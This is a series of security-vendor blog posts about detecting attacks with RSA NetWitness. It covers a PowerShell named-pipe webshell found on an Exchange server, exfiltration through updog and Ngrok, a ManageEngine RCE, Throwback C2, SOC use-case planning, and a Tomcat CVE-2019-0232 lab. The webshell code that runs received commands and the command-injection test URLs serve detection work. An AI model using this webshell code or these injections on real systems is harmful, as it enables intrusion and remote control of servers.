     $list = Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -eq $cmd -and $_.Handle -ne $pid}
     if ($list.length -ge 50) {
          $list | foreach-Object -process {stop-process -id $_.Handle}
     function handleCommand() {
          while ($true) {
               Write-Host "create pipe server"
               $sid = new-object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $Null)
               $PipeSecurity = new-object System.IO.Pipes.PipeSecurity
               $AccessRule = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "FullControl", "Allow")
               $pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60, 'Byte', 'None', 32768, 32768, $PipeSecurity
               #$pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60
               $reader = new-object System.IO.StreamReader($pipe);
               $writer = new-object System.IO.StreamWriter($pipe);

               $path = $reader.ReadLine();
               $data = ''
               while ($true) {
                    $line = $reader.ReadLine()
                    if ($line -eq '**end**') {
                    $data += $line + [Environment]::NewLine
               write-host $path
               write-host $data
               try {
                    $parts = $path.Split(':')
                    $index = [int]::Parse($parts[0])
                    if ($index + 1 -eq $parts.Length) {
                         $retval = iex $data | Out-String
                    } else {
                         $parts[0] = ($index + 1).ToString()
                         $newPath = $parts -join ':'
                         $retval = send $parts[$index + 1] $newPath $data
                         Write-Host 'send to next' + $retval
               } catch {
                    $retval = 'error:' + $env:computername + '>' + $path + '> ' + $Error[0].ToString()
               Write-Host $retval
     function send($next, $path, $data) {
          write-host 'next' + $next
          write-host $path
          $client = new-object System.IO.Pipes.NamedPipeClientStream $next, $pipeName, 'InOut', 'None', 'Anonymous'
          $writer = new-object System.IO.StreamWriter($client)
          $reader = new-object System.IO.StreamReader($client);
          $resp = $reader.ReadToEnd()
     $ErrorActionPreference = 'Stop'
Invoke-Command -ScriptBlock $script


From an EDR perspective, the interesting aspect of this type of webshell is that other than the command to setup the pipe server, which is executed via the w3wp.exe process, the rest of the commands are executed via the Powershell command that sets up the pipe server, even though the commands are coming through w3wp.exe process. In fact, once the attacker setup this type of webshell in this intrusion, he/she deleted all of the initial ASPX based webshells.


Webshell interaction


Although during this incident the pipe webshell was only used on the exchange server itself, it is possible to 


Webshell Data Decryption


In order to communicate with this webshell, the attacker issued the commands via the /ews/exchange.asmx page. Lets break down the communication with this webshell and highlight some of the characteristics that make it unique. Here is a sample command:


POST /ews/exchange.asmx HTTP/1.1
host: webmail.***************.com
content-type: application/x-www-form-urlencoded
content-length: 385
Connection: close


HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-FEServer: ***************
Date: Sat, 07 Mar 2020 08:10:43 GMT
Content-Length: 1606656

627Rf6z7SNyH+zHe0dEAcBAZDH2sEfyFUe2QQjK8J7M/QBU5vDGj***** REDACTED ******


The request to /ews/exchange.asmx is done in lowercase. While there are a couple of email clients that exhibit that same behavior, they could be quickly filtered out, especially when we see that the requests to this webshell do not even contain a user agent. We also notice that several of the other HTTP headers are in lowercase. Namely,

host: vs Host:

content-type: vs Content-Type:

content-length: vs Content-Length:


The actual command follows the HTTP headers. Lets break down this command:




The beginning of the payload contains part of the AES encryption key. Namely, in the decompiled code shown above we notice that the AES key is: kByTsFZq********nTzuZDVs********


The data that follows the first 8 bytes of the key is shown below:




Lets decrypt this data step by step, and build a Cyberchef recipe to do the job for us:


Step 1 - 3: The obfuscated data needs to be URL decoded, however, the + character is a legitimate Base64 character that is misinterpreted by the URL decoder as a space. So, we first replace the + with a . (dot). The + character will not necessarily be in every chunk of Base64 encoded data, but we need to account for it in order to build an error free recipe.


Decrypting: Step 1-3


Step 4 – 5: At this point we can Base64 decode the data. However, the data that we will get from this step is binary in nature, so we will convert to ASCII hex as well, since we need to use part of it for the AES IV.


Decryption: Step 4-5


Step 6 – 7: The first 32 bytes of ASCII hex (16 bytes raw) are the AES IV, so in these two steps we use the Register function of Cyberchef to store these bytes in $R0, and then remove them with the Replace function:


Decryption: Step  6-7


Step 8: Finally we can decrypt the data using the static AES key that we got from the decompiled code, and the dynamic IV value that we extracted from the decoded data.


Decryption: Step 8


The actual recipe is shown below:'option':'Simple%20string','string':'%2B'%7D,'.',true,false,true,false)URL_Decode()Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%2B',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)Register('(.%7B32%7D)',true,false,false)Find_/_Replace(%7B'option':'Regex','string':'.%7B32%7D(.*)'%7D,'$1',true,false,true,false)AES_Decrypt(%7B'option':'Latin1','string':'kByTsFZqREDACTEDnTzuZDVsREDACTED'%7D,%7B'option':'Hex','string':'$R0'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D)


We use the same recipe to decode the second chunk of encoded data in the request (SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D), which ends up only decoding to the following:


Decryption: Part 2


The response does not contain any parts of the key, so we can just copy everything following the HTTP headers and decrypt with the same formula. Here is a partial view of the results of the command, which is just a file listing of the \Windows\temp folder:


Decrypt Response


NetWitness Platform - Detection


The malicious activity in this incident will be detected at multiple stages by NetWitness Endpoint from the exploit itself, to the webshell activity and subsequent commands executed via the webshells. The easiest way to detect webshell activity, regardless of its type, is to monitor any web daemon processes (such as w3wp.exe) for uncommon behavior. Uncommon behavior for such processes primarily falls into three categories:

  1. Web daemon process starting a shell process.
  2. Web daemon process creating (writing) executable files.
  3. Web daemon process launching uncommon processes (here you may have to filter out some processes based on your environment).


The NetWitness Endpoint 11.4 comes with various AppRules to detect webshell activity:


Webshell detection rules


The process tree will also reveal the commands that are executed via the webshell in more detail:


Process flow


Several other AppRules detect the additional activity, such as:

PowerShell Double Base64
Runs Powershell Using Encoded Command
Runs Powershell Using Environment Variables
Runs Powershell Downloading Content
Runs Powershell With HTTP Argument
Creates Local User Account


As part of your daily hunting you should always also look at any Fileless_Scripts, which are common when encoded powershell commands are executed:


Fileless_Script events


From the NetWitness packet perspective such network traffic is typically encrypted unless SSL interception is already in place. RSA highly recommends that such technology is deployed in your network to provide visibility into this type of traffic, which also makes up a substantial amount of traffic in every network.


Once the traffic is decrypted, there are several aspects of this traffic that are grouped in typical hunting paths related to  the HTTP protocol, such as HTTP with Base64, HTTP with no user agent, and several others shown below:


Service Analysis


The webshell commands are found in the Query meta key:


Query meta key


In order to flag the lowercase request to /ews/exchange.asmx we will need to setup a custom configuration using the SEARCH parser, normally disabled by default. We can do the same with the other lowercase headers, which are the characteristics we observed of whatever client the attacker is using to interact with this webshell. In NWP we can  quickly setup this in the search.ini file of your decoder.  Any hits for this string can then be referenced in AppRules by using this expression (found = 'Lowercase EWS'), and can be combined with other metadata.


Search.ini config




This incident demonstrates the importance of timely patching, especially when a working exploit is publicly available for a vulnerability. However, regardless of whether you are dealing with a known exploit or a 0-day, daily hunting and monitoring can always lead to early detection and reduced attacker dwell time. The NetWitness Platform will provide your team with the necessary visibility to detect and investigate such breaches.


Special thanks to Rui Ataide and Lee Kirkpatrick for their assistance with this case.

Lee Kirkpatrick

What's updog?

Posted by Lee Kirkpatrick Employee Mar 16, 2020

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set adhoc SSL certificates and use HTTP basic auth. It was created by sc0tfree  and can be found on his GitHub page here. In this blog post we will use updog to exfiltrate information and show you the network indicators left behind from its usage.


The Attack

We are starting updog with all the default settings on the attacker machine, this means it will expose the directory we are currently running it from over HTTP on port 9090:


In order to quickly make updog publicly accessible over the internet, we will use a service called, Ngrok. This service exposes local servers behind NATs and firewalls to the public internet over secure tunnels - the free version of Ngrok creates a randomised URL and has a lifetime of 8 hours if you have not registered for a free account:


This now means that we can access our updog server over the internet using the randomly generated Ngrok URL, and upload a file from the victims machine:


The Detection using NetWitness Network

An item of interest for defenders should be the use of services such as Ngrok. They are commonly utilised in phishing campaigns as the generated URLs are randomised and short lived. With a recent update to the DynDNS parser from William Motley, we now tag many of these services in NetWitness under the Service Analysis meta key with the meta value, tunnel service:



Pivoting into this meta value, we can see there is some HTTP traffic to an Ngrok URL, an upload of a file called supersecret.txt, a suspicious sounding Server Application called werkzeug/1.0.0 python/3.8.1, and a Filename with a PNG image named, updog.png:



Reconstructing the sessions for this traffic, we can see the updog page as the attacker saw it, and we can also see the file that was uploaded by them:



NetWitness also gives us the ability to extract the file that was transferred to the updog server, so we can see exactly what was exfiltrated:


Detection Rules

The following table lists an application rule you can deploy to help with identifying these tools and behaviours:






Packet Decoder

Detects the usage of Updog

server begins 'werkzeug ' && filename = 'updog.png '





As a defender, it is important to monitor traffic to services such as Ngrok as they can pose a significant security risk to your organisation, there are also multiple alternatives to Ngrok and traffic to those should be monitored as well. In order for the new meta value, tunnel service to start tagging these services, make sure to update your DynDNS Lua parser.


Security Operation Centre (SOC) comes in different forms (e.g. In-House, Outsourced, Hybrid etc) and sizes, depending on multiple factors such as the objectives and functions that the SOC is meant to serve, as well as the intended scale of monitoring. However, in almost all SOCs, there will always be a SIEM, which basically acts as the brain of the SOC to pick up anomalies by correlating and performing sense-making on the information coming in from various packet and log sources. More than often, the efficiency of your SOC in being able to detect potential breaches in a timely manner, depends very much on the SIEM itself, which includes from having the correct sizing and configuration, being integrated with the relevant data sources, to having the right Use Cases deployed, among others. In this post, we will be focusing on the strategy to plan and develop Use Cases that will lead to effective monitoring and detection in your SOC.  


Prioritise your Use Case Development by Road-mapping

When you are first starting out on your SOC journey, there will be many Use Cases which may come to mind that would cater to different threat scenarios. Most of the SOCs would typically make use of the Out-Of-The-Box (OOTB) Use Cases that are available as a start, however, this will not be sufficient in the long run. Hence, there is a need to also develop your own Use Cases on top of the OOTB ones. The fact is that Use Case development is a lengthy and on-going process, from identifying the problem statement to finetuning the Use Cases, and also coupled with the fact that the threat landscape is constantly evolving. Therefore, it is always important to be able to prioritise which Use Cases to be developed first and one of the best ways to do so, is to come up with a roadmap. 


When it comes to road-mapping for your Use Case development, there are many good open-source references available, such as the MITRE ATT&CK Framework and THE VERIS Framework, which are useful resources to aid you in your roadmap planning, further information can be found in the following URLs - MITRE ATT&CK, THE VERIS However, it is important to note that while such frameworks form good references, they should not be taken wholesale when it comes to planning for your organisation’s Use Case development roadmap, reason being all organisations are unique and therefore not all areas are applicable. Prior to planning for the roadmap, it will be worthwhile to first perform a Priority Analysis, where you can identify the priority areas in which the Use Cases should be focused upon, based on factors such as the following:


  •      Existing threat profile including top known threats,


  •     Critical Assets and Services (note: It is extremely important for an organisation to have in place a well-defined methodology to regularly and systematically identify Critical Assets and Services as the outputs from such identification exercises are integral to many other parts of your security operations e.g. from deciding on the level of monitoring of an asset to assigning the appropriate severity level to an incident.)


  •      Critical Impact Areas to the organisation e.g. Financial, Reputation, Regulatory etc.


With the Priority Analysis being performed, you will then be able to identify which are your “Crown Jewels” and prioritise the protection efforts by developing the relevant Use Cases around them.


The Development Lifecycle

Once the priority areas have been identified, the next step will be to brainstorm for relevant Use Cases in these areas, before developing and finally deploying them into the SIEM. The following summarises the phases in a typical Use Case development lifecycle:


  1.       Define Problem Statement. This highlights the “problem” that you wish to solve (i.e. the threat that you wish to detect) by having the Use Case, and give rises to the objective of the Use Case which you are planning to develop. It is important to note that in planning which Use Case to be developed, the relevancy of a Use Case should not be determined solely based on presence of indicators from the past logs of the environment, because it does not mean that an incident (e.g. breach) that have not happened before will not occur in the future (Refer to the Priority Analysis explained in the previous section for recap on how to identify relevant Use Cases).  


  1.       Develop High Level Logic. Once the objective of the Use Case is clear, the next step will be to develop the high-level logic of the Use Case using pseudo code. This includes identifying the necessary parameters such as the length of the “view” or “window” and the number of counts required to trigger the Use Case. Try to avoid focusing too much on the actual syntax at this stage as this may cloud your thinking and increase the chances of introducing errors into your logic design.


  1.       Identify Data Requirements. Identify the packet and/ or log sources that are required as inputs into the Use Case and check their availability in the production environment.


  1.      Check Live Resource or Internal Library. Based on the high-level logic developed, always try to look for similar and existing Use Cases that are available in the Live Resource (more information at:, community platforms or your own internal Use Case library, instead of developing them from scratch, as this would help to potentially minimize the efforts on development and at the same time reduce chances of human errors.


  1.     Development. Proceed to develop the Use Case in syntax form by either making modifications from existing references or develop from scratch if there are no other alternatives.


  1.     Test & Deploy. Deploy the Use Case in a test or staging environment where possible, and simulate the threat scenario which the Use Case is intended to detect to confirm that the Use Case is functioning correctly, before proceeding to deploy it in the production environment. Note that there is an option in NetWitness to deploy the Use Case as a Trial Rule, more information can be found at:


  1.       Monitor False Positive & False Negative Rates. Once the rule has been successfully deployed into the SIEM, set up the necessary metrics to monitor the False Positive and False Negative rates.
  •  A high False Positive rate is likely to take a toll on the SOC operations in the long run, as unnecessary human resources and efforts would be spent on triaging all the false positives.


  •  Do note that while False Positives can be determined following triage, it is much more challenging to determine and obtain an accurate picture of the False Negative rate, as this is only possible when you happened to learn of an actual breach and where the relevant Use Case failed to trigger in your environment i.e. you do not know what you do not know. In many instances, breaches could go undetected for a prolonged period of time, hence making False Negative rate an extremely difficult metric to be measured. Therefore, it is important to properly test out the Use Case where possible, following initial deployment.


  1.      Finetune. Now, should you stop yourself from deploying a particular Use Case for fear of introducing a potentially high False Positive rate? We all know that high false positive rates are one of the nightmares for an analyst, however, we should not be stopping ourselves from deploying a particular Use Case into the environment simply because of this, reason being the Use Case serves to exist in the first place because of the “problem” that you need to solve (as defined in your Problem Statement). Rather, we should look to deploy, monitor and fine tune the Use Case to reduce the False Positive rate over time. At this point, we have to caution that this is not a one-time process and may require several iterations of review and finetuning over time to eventually stabilise the False Positive rate to an acceptable level.


  1.      Regular Review. Again, as the threat landscape evolves constantly, we should look to put in place a process to conduct regular reviews of the existing Use Cases, finetune or even retire them if they are no longer relevant, in order to maintain the overall detection efficiency of the SIEM.



Now that the Use Case has been deployed into the environment, what is the next step? While the monitoring and detection part of the cycle has been taken care of, it is equally important to also ensure that we have a robust incident response mechanism in place. Apart from the Incident Response Framework which spells out the high-level response process, it is recommended to go into the second order of details to put in place the relevant Playbooks, which are step-by-step response procedures with tasks tagged to individual SOC roles and specific to different threat scenarios. As a good practice, such Playbooks should also be tagged to the relevant Use Cases that are deployed in your SOC. The following diagram summarises how we can make use of the playbooks during the Incident Response cycle depending on the maturity level of the SOC:


  1.       Printed Procedures. This is the least mature method to operate the Playbooks and is generally not recommended unless there are no other suitable alternatives.


  1.      Shared Spreadsheet. This is suitable for small scaled or newly set-up SOCs which are not ready to invest in a SIRP or SOAR yet. For each new case, the relevant playbook template can be pulled out and populated onto an excel spreadsheet (or equivalent) and have it deposited into a shared drive available to all the SOC members, where analysts could update the incident response actions that they have taken while the SOC Manager, Incident Handler or Analyst Team Lead could track the status of the open cases through these spreadsheets.


  1.     SIRP. This is basically an Incident Management Platform which allow the analysts to easily apply the relevant playbooks and update the status of the incidents in a centralised platform. As compared to the spreadsheet method, the SIRP allows for a stricter access control in terms of being able to define and enforce different level of permissions across different roles in the platform, as well as the ability to maintain an audit trail.


  1.      SOAR. This Orchestrator provides a greater degree of automation in the incident response as compared to SIRP, which could potentially cut down the response time and increase the overall efficiency of the analysts.



To conclude, there is no one-size-fit-all solution when it comes to developing the Use Cases in your organisation and one of the recommended ways is to define a short-to-medium term roadmap customised to your environment for Use Case development. The roadmap should also be reviewed and revised from time-to-time to ensure that it stays relevant to the constantly evolving threat landscape. In general, your SOC should have adequate coverage (in terms of monitoring, detection and response) across different phases in the Cyber Kill Chain as shown below:



We hope that you find this useful in planning for the Use Cases to be developed in your organisation and happy building!

A zero-day RCE (Remote Code Execution) exploit against ManageEngine Desktop Central was recently released by ϻг_ϻε (@steventseeley). The description of how this works in full and the code can be found on his website, We thought we would have a quick run of this through the lab to see what indicators it leaves behind.


The Attack

Here we simply run the script and pass two parameters, the target, and the command - which in this case is using cmd.exe to execute whoami and output the result to a file named si.txt:


We can then access the output via a browser and see that the command was executed as SYSTEM:


Here we execute ipconfig:


And grab the output:


The Detection in NetWitness Packets

The script sends a HTTP POST to the ManageEngine server as seen below. It targets the MDMLogUploaderServlet over its default port of 8383 to upload a file with controlled content for the deserialization vulnerability to work, in this instance the file is named The command to be executed can also be seen in the body of the POST:

The traffic by default for this exploit is over HTTPS, so you would need SSL interception to see what is shown here.


This is followed by a GET request to the file that was uploaded via the POST for the deserialization to take place, which is what executes the command passed in the first place:


This activity could be detected by using the following logic in an application rule:

(service = 80) && (action = 'post') && (filename = 'mdmloguploader') && (query begins 'udid=') || (service = 80) && (action = 'get') && (directory = '/cewolf/')


The Detection Using NetWitness Endpoint

To detect this RCE in NetWitness Endpoint, we have to look for Java doing something it normally shouldn't, as this is what ManageEngine uses. It is not uncommon for Java to execute cmd, so the analyst has to look into the commands to understand if it is normal behaviour or not - from the below we can see java.exe spawning cmd.exe and running reconaissance type commands, such as whoami and ipconfig - this should stand out as odd:


The following application rule logic could be used to pick up on this activity. Here we are looking for Java being the source of execution as well as looking for the string "tomcat" to narrow it down to Apache Tomcat web servers that work as the backend for the ManageEngine application, the final part is identifying fileless scripts being executed by it:

(filename.src ='java.exe') && (param.src contains'tomcat') && (filename.dst begins '[fileless','cmd.exe')

Other java based web servers will likely show a similar pattern of behavior when being exploited.




As an analyst it is important to stay up to date with the latest security news to understand if you organisation could potentially be at risk of compromise. Remote execution vulnerabilities such as the one outlined here can be an easy gateway into your network, and any devices reachable from the internet should be monitored for anomalous behaviour such as this. Applications should always be kept up to date and patches applied where available ASAP to avoid becoming a potential victim.

This post is going to cover a slightly older C2 framework from Silent Break Security called, Throwback C2. As per usual, we will cover the network and endpoint detections for this C2, but we will delve a little deeper into the threat hunting process for NetWitness as well.


The Attack

After installing Throwback and compiling the executable for infection, which in this case, we will just drop and execute manually. We will shortly see the successful connection back to the Throwback server:


Now we have our endpoint communicating back with our server, we can execute typical reconaissance type commands against it, such as whoami:


Or tasklist to get a list of running processes:


This C2 has a somewhat slow beacon that by default is set to ~10 minutes, so we have to wait that amount of time for our commands to be picked up and executed:



Detection Using NetWitness Network

To begin hunting, the analyst needs to prepare a hypothesis of what it is they believe is currently taking place in their network. This process would typically involve the analyst creating multiple hypotheses, and then using NetWitness to prove, or disprove them; for this post, our hypothesis is going to be that there is C2 traffic - these can be as specific or as broad as you like, and if you struggle to create them, the MITRE ATT&CK Matrix can help with inspiration.


Now that we have our hypothesis, we can start to hunt through the data. The below flow is an example of how we do exactly that with HTTP:

  1. Based on what we are looking for defines the direction. So in this case, we are looking for C2 communication, which means our direction will be outbound (direction = 'outbound')
  2. Secondly, you want to focus on a single protocol at a time. So for our hypothesis, we could start with SSL, if we have no findings, we can move on to another protocol such as HTTP. The idea is to navigate through them one by one to separate the data into smaller more manageable buckets without getting distracted (service = 80)
  3. Now we want to hone in on the characteristics of the protocol, and pull it apart. As we are looking for C2 communication, we would want to pull apart the protocol to look for more mechanical type behaviour - one meta key that helps with this is Service Analysis - the below figure shows some examples of meta values created based off HTTP


A great place to get more detail on using NetWitness for hunting can be found in the RSA NetWitness Hunting Guide: RSA NetWitness Hunting Guide PDF.


From the Investigation view, we can start with our initial query looking for outbound traffic over HTTP, and open the Service Analysis meta key. There are a fair number of meta values generated, and all of them are great places to start pivoting on, you can choose to pivot on an individual meta value, or multiple. We are going to start by pivoting on three, which are outlined below:

  • http six or less headers: Modern day browsers typically have seven or more headers. This could indicate a more mechanical type HTTP connection
  • http single response: Typical user browsing behaviour would result in multiple requests and responses in a single TCP connection. A single request and response can indicate more mechanical type behaviour
  • http post no get no referer: HTTP connections with no referer or GET requests can be indicative of machine like behaviour. Typically the user would have requested one or more pages prior to posting data to the server, and would have been referred from somewhere


After pivoting into the meta values above, we reduce the number of sessions to investigate to a more manageable volume:


Now we can start to open other meta keys and look for values of interest without being overwhelmed by the enormous amount of data. This could involve looking at meta keys such as Filename, Directory, File Type, Hostname Alias, TLDSLD, etc. Based off the meta values below, the domain de11-rs4[.]com stands out as interesting and something we should take a look at; as an analyst, you should investigate all domains you deem of interest:


Opening the Events view for these sessions, we can see a beacon pattern of ~10 minutes, the filename is the same everytime, and the payload size is consistent apart from the initial communication which could be a download of a second stage module to further entrench - this could also be legitimate traffic and software simply checking in for updates, sending some usage data, etc.:


Reconstructing the events, we can see the body of the POST contains what looks like Base64 encoded data, and in the response we see a 200 OK but with a 404 Not Found message and a hidden attribute which references cmd.exe and whoami:

The Base64 data in the POST is encrypted, so decoding it at this point would not reveal anything useful. We may, however, be able to obtain the key and encryption mechanism if we had the executable, keep reading on to see!


Similarly we see another session which is the same but the hidden attribute references tasklist.exe:

The following application rule logic would detect default Throwback C2 communication:
service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http post no get no referer' && filename = 'index.php' && directory = '/' && query begins 'pd='

This definitely stands out as C2 traffic and would warrant further investigation into the endpoint. This could involve directly analysing all network traffic for this machine, or switching over to NetWitness Endpoint to analyse what it is doing, or both.


NOTE: The network traffic as seen here would be post proxy, or traffic in a network with no explicit proxy settings (


Detection Using NetWitness Endpoint

As per usual, I start by opening the compromise keys. Under Behaviours of Compromise (BOC), there are multiple meta values of interest, but let's start with outbound from unsigned appdata directory:


Opening the Events view for this meta value, we can see that an executable named, dwmss.exe, is making a network connection to de11-rs4[.]com:


Coming back to the investigation view, we can run a query to see what other activity this executable is performing. To do this, we execute the following query, filename.src = 'dwmss.exe' - here we can see the executable is running reconaissance type commands:


From here we decide to download the executable directly from the machine itself and perform some analysis on it. In this case, we ran strings and analysed the output and saw there were a large number of references to API calls of interest:


There is also a string that references RC4, which is an encryption algorithm. This could be of potential interest to decrypt the Base64 text we saw in the network traffic:


RC4 requires a key, so while analysing the strings we should also look for potential candidates for said key. Not far from the RC4 string is something that looks like it could be what we are after:


Navigating back to the packets and copying some of the Base64 from one of the POST's, we can run it through the RC4 recipe on CyberChef with our proposed key; in the output we can see the data decoded successfully and contains information about the infected endpoint:


Now we have confirmed this is malware, we should go back and look at all the activity generated by this process. This could be any file that it has created, files dropped around the same time, folders it may be using, etc.



C2 frameworks are constantly being developed and improved upon, but as you can see from this C2 which is ~6 years old, their operation is fairly consistent with what we see today, and with the way NetWitness allows you to pull apart the characteristics of the protocol, they can easily be identified.

It is possible to add RSA NetWitness as a Search Engine in Chrome, which allows to run queries directly from the address bar.



The following are the steps to follow in your browser to set this up.


  1. Start by navigating to your NetWitness instance on the device you want to query (typically the broker). Note the highlighted number in the address (this number identifies the device to query and varies from environment to environment).
  2. Right click in the navigation bar and select "Edit search engines..."




  1. Click on "Add" to add a new search engine
  2. Add the information for your NetWitness instance
    • Search Engine: This can be any name of your choice. This is the name that will show in the address bar when selected
    • Keyword: This is the keyword that will be used to trigger NetWitness as the Search Engine to use (initiated by typing "keyword" followed by the <tab> key)
    • URL: this should be based on the following structure: https://<netwitness_ip>/investigation/<number from 1st step>/navigate/query/%s
  3. Click on "Add" to add NetWitness as a Search Engine



Now, whenever you click on the address bar, type nw followed by the <tab> key (or whatever keyword you have chosen in the previous step), you can directly type your NetWitness query in the address bar and hit <enter> to run the query on NetWitness.




We are excited to share that Dell Technologies (RSA) has been positioned as a “Leader” by Gartner in the 2020 Magic Quadrant for Security Information and Event Management research report for its RSA NetWitness® Platform – for the second year in a row!


The RSA NetWitness Platform pulls together SIEM, network detection and response, endpoint detection and response, UEBA and orchestration and automation capabilities into a single evolved SIEM. RSA’s continued investments in the platform position us as the go-to platform for security teams to rapidly detect and respond to threats across their entire environment.


The 2020 Gartner Magic Quadrant for SIEM evaluates 16 vendors on the basis of the completeness of their vision and ability to execute. The report provides an overview of each vendor’s SIEM offering, along with what Gartner sees as strengths and cautions for each vendor. The report also includes vendor selection tips, guidance on how to define requirements for SIEM deployments, and details on its rigorous inclusion, exclusion and evaluation criteria. 


Download the report and learn more about RSA NetWitness Platform.


Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 18 February 2020

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


As Leader in Magic Quadrant for Security Information and Event Management 2020

As Leader in Magic Quadrant for Security Information and Event Management 2018


GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved

The concept of multi-valued meta keys - those which can appear multiple times within single sessions - is not a new one, but has become more important and relevant in recent releases due to how other parts of the RSA NetWitness Platform handle them.


The most notable of these other parts is the Correlation Server service, previously known as the ESA service.  In order to enable complex, efficient, and accurate event correlation and alerting, it is necessary for us to tell the Correlation Server service exactly which meta keys it should expect to be multi-valued.


Every release notes PDF for each RSA NetWitness Platform version contains instructions for how to update or modify these keys to tune the platform to your organization's environment. But the question I have each time I read these instructions is this: How do I identify ALL the multi-valued keys in my RSA NetWitness Platform instance?


After all, my lab environment is a fraction the size of any organization's production environment, and if it's an impossible task for me to manually identify all, or even most, of the these keys then its downright laughable to expect any organization to even attempt to do the same.


Enter....automation and scripting to the rescue!

superhero entrance


The script attached to this blog attempts to meet that need.  I want to stress "attempts to" here for 2 reasons:

  1. Not every metakey identified by this script necessarily should be added to the Correlation Server's multi-valued configuration. This will depend on your environment and any tuning or customizations you've made to parsers, feeds, and/or app rules.
    1. For example, this script identified 'user.dst' in my environment.
    2. However, I don't want that key to be multi-valued, so I'm not going to add it.
    3. Which leaves me with the choice of leaving it as-is, or undoing the parser, feed, and/or app rule change I made that caused it to happen.
  2. In order to be as complete in our identification of multi-valued metas as we can, we need a large enough sample size of sessions and metas to be representative of most, if not all, of an organization's data.  And that means we need sample sizes in the hundreds-of-thousands to millions range.


But therein lies the rub.  Processing data at that scale requires us to first query the RSA NetWitness Platform databases for all that data, pull it back, and then process it....without flooding the RSA NetWitness Platform with thousands or millions of queries (after all, the analysts still need to do their responding and hunting), without consuming so many resources that the script freezes or crashes the system, and while still producing an accurate result...because otherwise what's the point?


I made a number of changes to the initial version of this script in order to limit its potential impact.  The result of these changes was that the script will process batches of sessions and their metas in chunks of 10000.  In my lab environment, my testing with this batch size resulted in roughly 60 seconds between each process iteration.


The overall workflow within the script is:

  1. Query the RSA NetWitness Platform for a time range and grab all the resulting sessionids.
  2. Query the RSA NetWitness Platform for 10000 sessions and all their metas at a time.
  3. Receive the results of the query.
  4. Process all the metas to identify those that are multi-valued.
  5. Store the result of #3 for later.
  6. Repeat steps 2-5 until all sessions within the time range have been process.
  7. Evaluate and deduplicate all the metas from #4/5 (our end result).


This is best middle ground I could find among the various factors.

  • A 10000 session batch size will still result in potentially hundreds or thousands of queries to your RSA NetWitness Platform environment
    • The actual time your RSA NetWitness Platform service (Broker or Concentrator) spends responding to each of these should be no more than ~10-15 seconds each.
  • The time required for the script to process each batch of results will end up spacing out each new batch request to about 60 seconds in between.
    • I saw this time drop to as low as 30 seconds during periods of minimal overall activity and utilization on my admin server.
  • The max memory I saw the script utilize in my lab never exceeded 2500MB.
  • The max CPU I saw the script utilize in my lab was 100% of a single CPU.
  • The absolute maximum number of sessions the script will ever process in a single run is 1,677,721. This is a hardcoded limit in the RSA NetWitness SDK API, and I'm not inclined to try and work around that.


The output of the script is formatted so you can copy/paste directly from the terminal into the Correlation Server's multi-valued configuration.  Now with all that out of the way, some usage screenshots:





Any comments, questions, concerns or issues with the script, please don't hesitate to comment or reach out.

What are LotL tactics?

Living-Off-The-Land tactics are those that involve the use of legitimate tools for malicious purposes. This is an old concept but a recent growing trend among threat actors because these types of techniques are very difficult to detect considering that the tools used are whitelisted most of the time. A good list of applications that can be used for these type of tactics can be found at LOLBAS (Windows) and GTFOBins (UNIX).



The first part of this article will show how an attacker is able to spot and exploit a recent RCE (Remote Code Execution) vulnerability for Apache Tomcat. We will see how the attacker will eventually be able to get a reverse shell using a legitimate Windows utility mshta.exe. The second part will focus on the detection phase leveraging the RSA NetWitness Platform.



The attacker has targeted an organization we will call examplecorp throughout this blog post. During the enumeration phase, thanks to resources such as Google dorks, and nmap, the attacker has discovered the company runs a Tomcat server which is exposed to the Internet. Upon further research, the attacker finds a vulnerability and successfully exploits it in order to obtain a reverse shell, which will serve as the foundation for his malicious campaign against examplecorp


To achieve what has been described in the above scenario the attacker uses different tools and services:


The scenario is simulated on a virtual local environment. Below is a list of the IP addresses used:

  •  --> attacker machine (Kali Linux)
  •    --> victim/examplecorp machine  (Windows host where Tomcat is running)
  •  --> remote server where the attacker stored the malicious payload (shell.hta)


Part 1 - Attack phase

With enumeration tools such as nmap, gobuster, etc., the attacker discovers that the Tomcat server is on version 9.0.17, it is running on Windows and it serves a legacy application through a CGI Servlet at the following address:


Hello World!

In our example the application will be as simple as "Hello, World!" but will be something else in reality.


Upon further research the attacker discovers a vulnerability (CVE-2019-0232) in the CGI Servlet component of Tomcat prior to version 9.0.18. A detailed description of the vulnerability can be found here at the following links:


With a simple test the attacker can verify the vulnerability. Just by adding ?&dir at the end of the URL the attacker can see the output of the dir command on the affected Windows server Tomcat is running on.

root@kali:~# curl ""
Hello, World!
Volume in drive C has no label.
Volume Serial Number is 4033-77BA

Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

19/12/2019  13:27    <DIR>          .
19/12/2019  13:27    <DIR>          ..
17/12/2019  15:00    <DIR>          %SystemDrive%
16/12/2019  21:37                67 app.bat
19/12/2019  13:19                21
               2 File(s)             88 bytes
               3 Dir(s)  39,850,405,888 bytes free


